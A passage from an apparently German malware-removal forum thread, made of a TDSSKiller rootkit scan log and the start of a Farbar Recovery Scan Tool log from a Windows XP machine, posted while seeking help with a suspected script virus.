12:04:19.0000 3580 [ B2F17A2EDB5450E61973A037F63A595B ] Parport C:\WINDOWS\system32\DRIVERS\parport.sys
12:04:19.0109 3580 Parport - ok
12:04:19.0125 3580 [ 3334430C29DC338092F79C38EF7B4CD0 ] PartMgr C:\WINDOWS\system32\drivers\PartMgr.sys
12:04:19.0218 3580 PartMgr - ok
12:04:19.0250 3580 [ C2BF987829099A3EAA2CA6A0A90ECB4F ] ParVdm C:\WINDOWS\system32\drivers\ParVdm.sys
12:04:19.0359 3580 ParVdm - ok
12:04:19.0359 3580 [ 6FB463E5B243FBD6F3D3C83F914D94FB ] PCI C:\WINDOWS\system32\DRIVERS\pci.sys
12:04:19.0453 3580 PCI - ok
12:04:19.0468 3580 PCIDump - ok
12:04:19.0468 3580 [ 59BA86D9A61CBCF4DF8E598C331F5B82 ] PCIIde C:\WINDOWS\system32\DRIVERS\pciide.sys
12:04:19.0578 3580 PCIIde - ok
12:04:19.0609 3580 [ E2363F4C1DAFF89ABEE5F593E13D8A05 ] Pcmcia C:\WINDOWS\system32\drivers\Pcmcia.sys
12:04:19.0718 3580 Pcmcia - ok
12:04:19.0718 3580 PDCOMP - ok
12:04:19.0734 3580 PDFRAME - ok
12:04:19.0734 3580 PDRELI - ok
12:04:19.0750 3580 PDRFRAME - ok
12:04:19.0750 3580 perc2 - ok
12:04:19.0765 3580 perc2hib - ok
12:04:19.0812 3580 [ EDB6B81761BD60F32F740BBC40AFB676 ] PlugPlay C:\WINDOWS\system32\services.exe
12:04:19.0906 3580 PlugPlay - ok
12:04:19.0906 3580 [ 183805EB05BCA5A1E4AAAED4D2BE3690 ] PolicyAgent C:\WINDOWS\system32\lsass.exe
12:04:20.0000 3580 PolicyAgent - ok
12:04:20.0031 3580 [ 1C5CC65AAC0783C344F16353E60B72AC ] PptpMiniport C:\WINDOWS\system32\DRIVERS\raspptp.sys
12:04:20.0109 3580 PptpMiniport - ok
12:04:20.0125 3580 [ 3D7F196E77F986C106E9320B81A5EBBF ] Processor C:\WINDOWS\system32\DRIVERS\processr.sys
12:04:20.0218 3580 Processor - ok
12:04:20.0234 3580 [ 183805EB05BCA5A1E4AAAED4D2BE3690 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe
12:04:20.0328 3580 ProtectedStorage - ok
12:04:20.0343 3580 [ 48671F327553DCF1D27F6197F622A668 ] PSched C:\WINDOWS\system32\DRIVERS\psched.sys
12:04:20.0437 3580 PSched - ok
12:04:20.0468 3580 [ 80D317BD1C3DBC5D4FE7B1678C60CADD ] Ptilink C:\WINDOWS\system32\DRIVERS\ptilink.sys
12:04:20.0578 3580 Ptilink - ok
12:04:20.0578 3580 ql1080 - ok
12:04:20.0593 3580 Ql10wnt - ok
12:04:20.0593 3580 ql12160 - ok
12:04:20.0609 3580 ql1240 - ok
12:04:20.0609 3580 ql1280 - ok
12:04:20.0640 3580 [ FE0D99D6F31E4FAD8159F690D68DED9C ] RasAcd C:\WINDOWS\system32\DRIVERS\rasacd.sys
12:04:20.0750 3580 RasAcd - ok
12:04:20.0765 3580 [ E3C6E87C1F84584A773D7C3DD205DBFF ] RasAuto C:\WINDOWS\System32\rasauto.dll
12:04:20.0859 3580 RasAuto - ok
12:04:20.0875 3580 [ 98FAEB4A4DCF812BA1C6FCA4AA3E115C ] Rasl2tp C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
12:04:20.0984 3580 Rasl2tp - ok
12:04:21.0015 3580 [ FFC8343B35FB2DF01A5767748EFA5B58 ] RasMan C:\WINDOWS\System32\rasmans.dll
12:04:21.0031 3580 RasMan - ok
12:04:21.0046 3580 [ 7306EEED8895454CBED4669BE9F79FAA ] RasPppoe C:\WINDOWS\system32\DRIVERS\raspppoe.sys
12:04:21.0125 3580 RasPppoe - ok
12:04:21.0140 3580 [ FDBB1D60066FCFBB7452FD8F9829B242 ] Raspti C:\WINDOWS\system32\DRIVERS\raspti.sys
12:04:21.0250 3580 Raspti - ok
12:04:21.0281 3580 [ 03B965B1CA47F6EF60EB5E51CB50E0AF ] Rdbss C:\WINDOWS\system32\DRIVERS\rdbss.sys
12:04:21.0312 3580 Rdbss - ok
12:04:21.0328 3580 [ 4912D5B403614CE99C28420F75353332 ] RDPCDD C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
12:04:21.0421 3580 RDPCDD - ok
12:04:21.0468 3580 [ B54CD38A9EBFBF2B3561426E3FE26F62 ] RDPWD C:\WINDOWS\system32\drivers\RDPWD.sys
12:04:21.0484 3580 RDPWD - ok
12:04:21.0515 3580 [ AEC159942DF64A9890072D7BB1797762 ] RDSessMgr C:\WINDOWS\system32\sessmgr.exe
12:04:21.0609 3580 RDSessMgr - ok
12:04:21.0625 3580 [ AA56702E230860565CB8D43680F57F33 ] redbook C:\WINDOWS\system32\DRIVERS\redbook.sys
12:04:21.0718 3580 redbook - ok
12:04:21.0734 3580 RegGuard - ok
12:04:21.0750 3580 [ EBA80CDF25E02084857957E820004934 ] RemoteAccess C:\WINDOWS\System32\mprdim.dll
12:04:21.0843 3580 RemoteAccess - ok
12:04:21.0921 3580 [ 73EFBAB8D822E1D3E008ADBC5CE21FB7 ] rkvnw C:\WINDOWS\system32\vstnvj.dll
12:04:21.0921 3580 Suspicious file (NoAccess): C:\WINDOWS\system32\vstnvj.dll. md5: 73EFBAB8D822E1D3E008ADBC5CE21FB7
12:04:21.0921 3580 rkvnw ( LockedFile.Multi.Generic ) - warning
12:04:21.0921 3580 rkvnw - detected LockedFile.Multi.Generic (1)
12:04:21.0953 3580 [ DA23F9F3F1B1871120F980A6879581AC ] RpcLocator C:\WINDOWS\system32\locator.exe
12:04:22.0062 3580 RpcLocator - ok
12:04:22.0093 3580 [ 891E3E4537C6DFCAE475073FC49CE9CB ] RpcSs C:\WINDOWS\system32\rpcss.dll
12:04:22.0109 3580 RpcSs - ok
12:04:22.0140 3580 [ 4BDD71B4B521521499DFD14735C4F398 ] RSVP C:\WINDOWS\system32\rsvp.exe
12:04:22.0250 3580 RSVP - ok
12:04:22.0281 3580 [ 183805EB05BCA5A1E4AAAED4D2BE3690 ] SamSs C:\WINDOWS\system32\lsass.exe
12:04:22.0359 3580 SamSs - ok
12:04:22.0406 3580 [ B4CF7B42DE6CFA6FDE7D6AF4DAA55F57 ] SCardSvr C:\WINDOWS\System32\SCardSvr.exe
12:04:22.0531 3580 SCardSvr - ok
12:04:22.0562 3580 [ D5E73842F38E24457C63FEF8CEFFBE19 ] Schedule C:\WINDOWS\system32\schedsvc.dll
12:04:22.0656 3580 Schedule - ok
12:04:22.0671 3580 [ D26E26EA516450AF9D072635C60387F4 ] Secdrv C:\WINDOWS\system32\DRIVERS\secdrv.sys
12:04:22.0718 3580 Secdrv - ok
12:04:22.0750 3580 [ FED544B43903FB801B106F062110358A ] seclogon C:\WINDOWS\System32\seclogon.dll
12:04:22.0859 3580 seclogon - ok
12:04:22.0875 3580 [ AB74D986C1DD0D0C95B6AD37EC1E9F4F ] SENS C:\WINDOWS\system32\sens.dll
12:04:22.0984 3580 SENS - ok
12:04:23.0000 3580 [ A2D868AEEFF612E70E213C451A70CAFB ] serenum C:\WINDOWS\system32\DRIVERS\serenum.sys
12:04:23.0093 3580 serenum - ok
12:04:23.0109 3580 [ CD5B9995AFCDB466C9EFC048D167E3BE ] Serial C:\WINDOWS\system32\DRIVERS\serial.sys
12:04:23.0203 3580 Serial - ok
12:04:23.0203 3580 [ 0D13B6DF6E9E101013A7AFB0CE629FE0 ] Sfloppy C:\WINDOWS\system32\drivers\Sfloppy.sys
12:04:23.0328 3580 Sfloppy - ok
12:04:23.0359 3580 [ 9245420422E409A25C1410ACB4244060 ] SharedAccess C:\WINDOWS\System32\ipnathlp.dll
12:04:23.0453 3580 SharedAccess - ok
12:04:23.0468 3580 [ 521A4CB71CC419FDF60DB83E7308AE2B ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
12:04:23.0468 3580 ShellHWDetection - ok
12:04:23.0484 3580 Simbad - ok
12:04:23.0484 3580 Sparrow - ok
12:04:23.0531 3580 [ 0CE218578FFF5F4F7E4201539C45C78F ] splitter C:\WINDOWS\system32\drivers\splitter.sys
12:04:23.0546 3580 splitter - ok
12:04:23.0578 3580 [ DA81EC57ACD4CDC3D4C51CF3D409AF9F ] Spooler C:\WINDOWS\system32\spoolsv.exe
12:04:23.0609 3580 Spooler - ok
12:04:23.0640 3580 [ E4200CB2F418D8FC4ACDD7E38C419D6A ] sr C:\WINDOWS\system32\DRIVERS\sr.sys
12:04:23.0687 3580 sr - ok
12:04:23.0703 3580 [ 015F302C4CF961F20C3F98F3A7CA7917 ] srservice C:\WINDOWS\system32\srsvc.dll
12:04:23.0734 3580 srservice - ok
12:04:23.0765 3580 [ EA554A3FFC3F536FE8320EB38F5E4843 ] Srv C:\WINDOWS\system32\DRIVERS\srv.sys
12:04:23.0796 3580 Srv - ok
12:04:23.0828 3580 [ 6FA03B462B2FFFE2627171B7FE73EE29 ] SSDPSRV C:\WINDOWS\System32\ssdpsrv.dll
12:04:23.0890 3580 SSDPSRV - ok
12:04:23.0906 3580 [ 25E9B30AF1FA1B9AF1853577F39FF20B ] stisvc C:\WINDOWS\system32\wiaservc.dll
12:04:23.0921 3580 stisvc - ok
12:04:23.0953 3580 [ 03C1BAE4766E2450219D20B993D6E046 ] swenum C:\WINDOWS\system32\DRIVERS\swenum.sys
12:04:24.0031 3580 swenum - ok
12:04:24.0062 3580 [ 94ABC808FC4B6D7D2BBF42B85E25BB4D ] swmidi C:\WINDOWS\system32\drivers\swmidi.sys
12:04:24.0171 3580 swmidi - ok
12:04:24.0187 3580 SwPrv - ok
12:04:24.0187 3580 symc810 - ok
12:04:24.0203 3580 symc8xx - ok
12:04:24.0203 3580 sym_hi - ok
12:04:24.0218 3580 sym_u3 - ok
12:04:24.0234 3580 [ 650AD082D46BAC0E64C9C0E0928492FD ] sysaudio C:\WINDOWS\system32\drivers\sysaudio.sys
12:04:24.0312 3580 sysaudio - ok
12:04:24.0343 3580 [ 6D0C43DF9D3A7C5A9B4F94772CBD5DDC ] SysmonLog C:\WINDOWS\system32\smlogsvc.exe
12:04:24.0437 3580 SysmonLog - ok
12:04:24.0484 3580 [ 427D7EB3B453347082C8F4B370065D60 ] TapiSrv C:\WINDOWS\System32\tapisrv.dll
12:04:24.0500 3580 TapiSrv - ok
12:04:24.0546 3580 [ 1DBF125862891817F374F407626967F4 ] Tcpip C:\WINDOWS\system32\DRIVERS\tcpip.sys
12:04:24.0578 3580 Tcpip - ok
12:04:24.0609 3580 [ 38D437CF2D98965F239B0ABCD66DCB0F ] TDPIPE C:\WINDOWS\system32\drivers\TDPIPE.sys
12:04:24.0703 3580 TDPIPE - ok
12:04:24.0750 3580 [ ED0580AF02502D00AD8C4C066B156BE9 ] TDTCP C:\WINDOWS\system32\drivers\TDTCP.sys
12:04:24.0859 3580 TDTCP - ok
12:04:24.0875 3580 [ A540A99C281D933F3D69D55E48727F47 ] TermDD C:\WINDOWS\system32\DRIVERS\termdd.sys
12:04:24.0984 3580 TermDD - ok
12:04:25.0031 3580 [ 1850BC10DE5DCCCEDE063FC2D0F2CEDA ] TermService C:\WINDOWS\System32\termsrv.dll
12:04:25.0140 3580 TermService - ok
12:04:25.0156 3580 [ 521A4CB71CC419FDF60DB83E7308AE2B ] Themes C:\WINDOWS\System32\shsvcs.dll
12:04:25.0171 3580 Themes - ok
12:04:25.0171 3580 TosIde - ok
12:04:25.0203 3580 [ A34E894201D66E380E1FA96FE11B587E ] TrkWks C:\WINDOWS\system32\trkwks.dll
12:04:25.0296 3580 TrkWks - ok
12:04:25.0328 3580 [ 12F70256F140CD7D52C58C7048FDE657 ] Udfs C:\WINDOWS\system32\drivers\Udfs.sys
12:04:25.0421 3580 Udfs - ok
12:04:25.0421 3580 ultra - ok
12:04:25.0468 3580 [ AFF2E5045961BBC0A602BB6F95EB1345 ] Update C:\WINDOWS\system32\DRIVERS\update.sys
12:04:25.0562 3580 Update - ok
12:04:25.0609 3580 [ 855790C1BACED245A6B210AF430ED17B ] upnphost C:\WINDOWS\System32\upnphost.dll
12:04:25.0609 3580 upnphost - ok
12:04:25.0625 3580 [ A99F867E76CFDAA28EE305B93F70E84F ] UPS C:\WINDOWS\System32\ups.exe
12:04:25.0718 3580 UPS - ok
12:04:25.0750 3580 [ BFFD9F120CC63BCBAA3D840F3EEF9F79 ] usbccgp C:\WINDOWS\system32\DRIVERS\usbccgp.sys
12:04:25.0843 3580 usbccgp - ok
12:04:25.0875 3580 [ 15E993BA2F6946B2BFBBFCD30398621E ] usbehci C:\WINDOWS\system32\DRIVERS\usbehci.sys
12:04:25.0968 3580 usbehci - ok
12:04:25.0984 3580 [ C72F40947F92CEA56A8FB532EDF025F1 ] usbhub C:\WINDOWS\system32\DRIVERS\usbhub.sys
12:04:26.0078 3580 usbhub - ok
12:04:26.0109 3580 [ BDFE799A8531BAD8A5A985821FE78760 ] usbohci C:\WINDOWS\system32\DRIVERS\usbohci.sys
12:04:26.0218 3580 usbohci - ok
12:04:26.0250 3580 [ 6CD7B22193718F1D17A47A1CD6D37E75 ] USBSTOR C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
12:04:26.0343 3580 USBSTOR - ok
12:04:26.0359 3580 [ 8A60EDD72B4EA5AEA8202DAF0E427925 ] VgaSave C:\WINDOWS\System32\drivers\vga.sys
12:04:26.0468 3580 VgaSave - ok
12:04:26.0484 3580 ViaIde - ok
12:04:26.0500 3580 [ D6888520FF56D72A50437E371CA25FC9 ] VolSnap C:\WINDOWS\system32\drivers\VolSnap.sys
12:04:26.0593 3580 VolSnap - ok
12:04:26.0625 3580 [ 6635ECBF0D8090DC3A452D0D072B5D5B ] VSS C:\WINDOWS\System32\vssvc.exe
12:04:26.0656 3580 VSS - ok
12:04:26.0703 3580 [ C6D874CD2A5B83CD11CDEBD28A638584 ] W32Time C:\WINDOWS\system32\w32time.dll
12:04:26.0812 3580 W32Time - ok
12:04:26.0828 3580 [ 984EF0B9788ABF89974CFED4BFBAACBC ] Wanarp C:\WINDOWS\system32\DRIVERS\wanarp.sys
12:04:26.0921 3580 Wanarp - ok
12:04:26.0921 3580 WDICA - ok
12:04:26.0953 3580 [ EFD235CA22B57C81118C1AEB4798F1C1 ] wdmaud C:\WINDOWS\system32\drivers\wdmaud.sys
12:04:26.0968 3580 wdmaud - ok
12:04:27.0000 3580 [ 879ECB9A5F14A03960B84EDB7207A051 ] WebClient C:\WINDOWS\System32\webclnt.dll
12:04:27.0015 3580 WebClient - ok
12:04:27.0078 3580 [ DA2DADB42916E59C6E4BBA593BCCDA73 ] winmgmt C:\WINDOWS\system32\wbem\WMIsvc.dll
12:04:27.0187 3580 winmgmt - ok
12:04:27.0234 3580 [ C51B4A5C05A5475708E3C81C7765B71D ] WmdmPmSN C:\WINDOWS\system32\MsPMSNSv.dll
12:04:27.0234 3580 WmdmPmSN - ok
12:04:27.0250 3580 [ 042A78FCD1ADFB0FBA9865D55C6F5CC1 ] WmiApSrv C:\WINDOWS\system32\wbem\wmiapsrv.exe
12:04:27.0343 3580 WmiApSrv - ok
12:04:27.0453 3580 [ BF05650BB7DF5E9EBDD25974E22403BB ] WMPNetworkSvc C:\Programme\Windows Media Player\WMPNetwk.exe
12:04:27.0500 3580 WMPNetworkSvc - ok
12:04:27.0531 3580 [ BD3561AAE748150CF51C2CA876449EA7 ] wscsvc C:\WINDOWS\system32\wscsvc.dll
12:04:27.0640 3580 wscsvc - ok
12:04:27.0656 3580 [ 1EDDD5C0ECF3FA6EDFD8A25B2B4E7DF6 ] wuauserv C:\WINDOWS\system32\wuauserv.dll
12:04:27.0750 3580 wuauserv - ok
12:04:27.0750 3580 [ F15FEAFFFBB3644CCC80C5DA584E6311 ] WudfPf C:\WINDOWS\system32\DRIVERS\WudfPf.sys
12:04:27.0765 3580 WudfPf - ok
12:04:27.0781 3580 [ 28B524262BCE6DE1F7EF9F510BA3985B ] WudfRd C:\WINDOWS\system32\DRIVERS\wudfrd.sys
12:04:27.0796 3580 WudfRd - ok
12:04:27.0828 3580 [ 05231C04253C5BC30B26CBAAE680ED89 ] WudfSvc C:\WINDOWS\System32\WUDFSvc.dll
12:04:27.0828 3580 WudfSvc - ok
12:04:27.0859 3580 [ AE83ADA96575DACF533C2BCB1FC163DC ] WZCSVC C:\WINDOWS\System32\wzcsvc.dll
12:04:27.0953 3580 WZCSVC - ok
12:04:27.0984 3580 [ 8302DE1C64618D72346DD0034DBC5D9B ] xmlprov C:\WINDOWS\System32\xmlprov.dll
12:04:28.0062 3580 xmlprov - ok
12:04:28.0078 3580 ================ Scan global ===============================
12:04:28.0109 3580 [ 1B91BAC6996731EE8925F58205DCB016 ] C:\WINDOWS\system32\basesrv.dll
12:04:28.0140 3580 [ 317DF8980138FB91AE03E95757F4D0E9 ] C:\WINDOWS\system32\winsrv.dll
12:04:28.0156 3580 [ 317DF8980138FB91AE03E95757F4D0E9 ] C:\WINDOWS\system32\winsrv.dll
12:04:28.0171 3580 [ EDB6B81761BD60F32F740BBC40AFB676 ] C:\WINDOWS\system32\services.exe
12:04:28.0171 3580 [Global] - ok
12:04:28.0171 3580 ================ Scan MBR ==================================
12:04:28.0187 3580 [ 72B8CE41AF0DE751C946802B3ED844B4 ] \Device\Harddisk0\DR0
12:04:28.0375 3580 \Device\Harddisk0\DR0 - ok
12:04:28.0375 3580 ================ Scan VBR ==================================
12:04:28.0375 3580 [ 3CF62A645B819090CE454534595179B7 ] \Device\Harddisk0\DR0\Partition1
12:04:28.0390 3580 \Device\Harddisk0\DR0\Partition1 - ok
12:04:28.0390 3580 [ 855C6C6DA94B7BBF37BBE3A10C7C7B5F ] \Device\Harddisk0\DR0\Partition2
12:04:28.0406 3580 \Device\Harddisk0\DR0\Partition2 - ok
12:04:28.0421 3580 [ 2022AC583F0FB48F0D23BB6EB3196FB5 ] \Device\Harddisk0\DR0\Partition3
12:04:28.0437 3580 \Device\Harddisk0\DR0\Partition3 - ok
12:04:28.0437 3580 ============================================================
12:04:28.0437 3580 Scan finished
12:04:28.0437 3580 ============================================================
12:04:28.0546 3476 Detected object count: 2
12:04:28.0546 3476 Actual detected object count: 2
12:05:07.0109 3476 NPPTNT2 ( UnsignedFile.Multi.Generic ) - skipped by user
12:05:07.0109 3476 NPPTNT2 ( UnsignedFile.Multi.Generic ) - User select action: Skip
12:05:07.0109 3476 rkvnw ( LockedFile.Multi.Generic ) - skipped by user
12:05:07.0109 3476 rkvnw ( LockedFile.Multi.Generic ) - User select action: Skip
12:13:39.0921 3480 Deinitialize success
Geändert von cosinus (23.05.2017 um 12:48 Uhr) Grund: CODE-Tags |
|
23.05.2017, 12:49
| #4 |
| | ActiveXObject Scrip Virus - Name: fuckyoumm2_consumerCode:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x86) Version: 22-05-2017
durchgeführt von * (Administrator) auf * (23-05-2017 10:53:41)
Gestartet von C:\Programme
Geladene Profile: * (Verfügbare Profile: *)
Platform: Microsoft Windows XP Home Edition (X86) Sprache: Deutsch (Deutschland)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(NVIDIA Corporation) C:\WINDOWS\system32\nvsvc32.exe
(Microsoft Corporation) C:\WINDOWS\system32\taskmgr.exe
(Mozilla Corporation) C:\Programme\Mozilla Firefox\firefox.exe
==================== Registry (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [NvCplDaemon] => RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
HKLM\...\Run: [nwiz] => nwiz.exe /install
HKLM\...\Run: [NvMediaCenter] => RunDLL32.exe NvMCTray.dll,NvTaskbarInit
HKLM\...\Run: [IMJPMIG8.1] => C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE [208952 2006-02-28] (Microsoft Corporation)
HKLM\...\Run: [PHIME2002ASync] => C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE [455168 2006-02-28] (Microsoft Corporation)
HKLM\...\Run: [PHIME2002A] => C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE [455168 2006-02-28] (Microsoft Corporation)
HKU\S-1-5-21-343818398-162531612-839522115-1004\...\MountPoints2: {9601dbc2-82e8-11dc-9997-806d6172696f} - F:\Setup.exe
ShellExecuteHooks: Kein Name - {F552DDE6-2090-4bf4-B924-6141E87789A5} - -> Keine Datei
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\..\Interfaces\{54B512C8-B541-4F18-97E0-F1D5DEC54330}: [NameServer] 217.0.43.97 217.0.43.113
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&clcid={SUB_CLSID}&pver={SUB_PVER}&ar=home
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-343818398-162531612-839522115-1004\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://ww.goggle.de/
HKU\S-1-5-21-343818398-162531612-839522115-1004\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
URLSearchHook: HKU\S-1-5-21-343818398-162531612-839522115-1004 - Microsoft Url Sucheingriff - {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - C:\WINDOWS\system32\shdocvw.dll (Microsoft Corporation)
HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURLs,Tabs: "" <======= ACHTUNG
SearchScopes: HKLM -> DefaultScope Wert fehlt
Handler: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL [2002-05-24] (Microsoft Corporation)
Handler: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL [2002-05-24] (Microsoft Corporation)
Handler: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL [2002-05-24] (Microsoft Corporation)
Handler: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL [2002-05-24] (Microsoft Corporation)
Handler: ipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL [2002-05-24] (Microsoft Corporation)
Handler: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL [2002-05-24] (Microsoft Corporation)
Handler: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL [2002-05-24] (Microsoft Corporation)
FireFox:
========
FF ProfilePath: C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default [2017-05-23]
FF user.js: detected! => C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default\user.js [2012-01-21]
FF Homepage: C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default -> hxxps://www.google.co.jp/
FF Session Restore: C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default -> ist aktiviert.
FF NetworkProxy: C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default -> type", 0
FF Extension: (Adblock Plus Pop-up Addon) - C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default\Extensions\adblockpopups@jessehakanen.net.xpi [2015-08-10]
FF Extension: (MEGA) - C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default\Extensions\firefox@mega.co.nz.xpi [2016-06-22]
FF Extension: (UAControl) - C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default\Extensions\uacontrol@qz.tsugumi.org.xpi [2015-08-10]
FF Extension: (Utopia FFSE White) - C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default\Extensions\{20C3BDFF-DA68-468d-8D9A-F5A6C76B0F9E} [2010-12-18] [ist nicht signiert]
FF Extension: (Tinseltown) - C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default\Extensions\{285da7e0-729d-11db-9fe1-0800200c9a66} [2010-12-18] [ist nicht signiert]
FF Extension: (ReloadEvery) - C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default\Extensions\{888d99e7-e8b5-46a3-851e-1ec45da1e644}.xpi [2015-08-10]
FF Extension: (Cookies Manager+) - C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default\Extensions\{bb6bc1bb-f824-4702-90cd-35e2fb24f25d} [2015-08-10]
FF Extension: (Adblock Plus) - C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2015-08-10]
FF Extension: (Hide Tab Bar With One Tab) - C:\Dokumente und Einstellungen\*\Anwendungsdaten\Mozilla\Firefox\Profiles\gjknnh46.default\Extensions\{e5bbc237-c99b-4ced-a061-0be27703295f}.xpi [2015-08-10]
FF HKLM\...\Firefox\Extensions: [{184AA5E6-741D-464a-820E-94B3ABC2F3B4}] - C:\WINDOWS\system32\5015 => nicht gefunden
FF HKU\S-1-5-21-343818398-162531612-839522115-1004\...\Firefox\Extensions: [{184AA5E6-741D-464a-820E-94B3ABC2F3B4}] - C:\WINDOWS\system32\5015 => nicht gefunden
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_2_202_235.dll [2012-05-27] ()
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Programme\Pando Networks\Media Booster\npPandoWebPlugin.dll [Keine Datei]
FF Plugin: @real.com/nppl3260;version=6.0.11.2852 -> C:\Programme\Real\RealPlayer\Netscape6\nppl3260.dll [Keine Datei]
FF Plugin: @real.com/nprjplug;version=1.0.2.2910 -> C:\Programme\Real\RealPlayer\Netscape6\nprjplug.dll [Keine Datei]
FF Plugin: @real.com/nprpjplug;version=6.0.12.1662 -> C:\Programme\Real\RealPlayer\Netscape6\nprpjplug.dll [Keine Datei]
FF Plugin: @zylom.com/ZylomGamesPlayer -> C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Zylom\ZylomGamesPlayer\npzylomgamesplayer.dll [2006-09-26] (Zylom)
FF Plugin ProgramFiles/Appdata: C:\Programme\mozilla firefox\plugins\npnul32.dll [2010-12-03] (mozilla.org)
FF ExtraCheck: C:\Programme\mozilla firefox\defaults\pref\firefox-branding.js [2010-12-03]
FF ExtraCheck: C:\Programme\mozilla firefox\defaults\pref\firefox-l10n.js [2010-12-03]
FF ExtraCheck: C:\Programme\mozilla firefox\defaults\pref\firefox.js [2010-12-03]
FF ExtraCheck: C:\Programme\mozilla firefox\defaults\pref\reporter.js [2010-12-03]
==================== Dienste (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 npggsvc; C:\WINDOWS\system32\GameMon.des [3566504 2010-04-07] (INCA Internet Co., Ltd.) [Datei ist nicht signiert]
S2 rkvnw; C:\WINDOWS\system32\vstnvj.dll [167900 2007-04-16] () [Datei ist nicht signiert]
S3 usprserv; C:\WINDOWS\System32\svchost.exe [14336 2006-02-28] (Microsoft Corporation) <==== ACHTUNG (ServiceDLL nicht gefunden)
S3 WMPNetworkSvc; C:\Programme\Windows Media Player\WMPNetwk.exe [920576 2006-11-03] (Microsoft Corporation)
S2 ServiceMt; kein ImagePath
===================== Treiber (Nicht auf der Ausnahmeliste) ======================
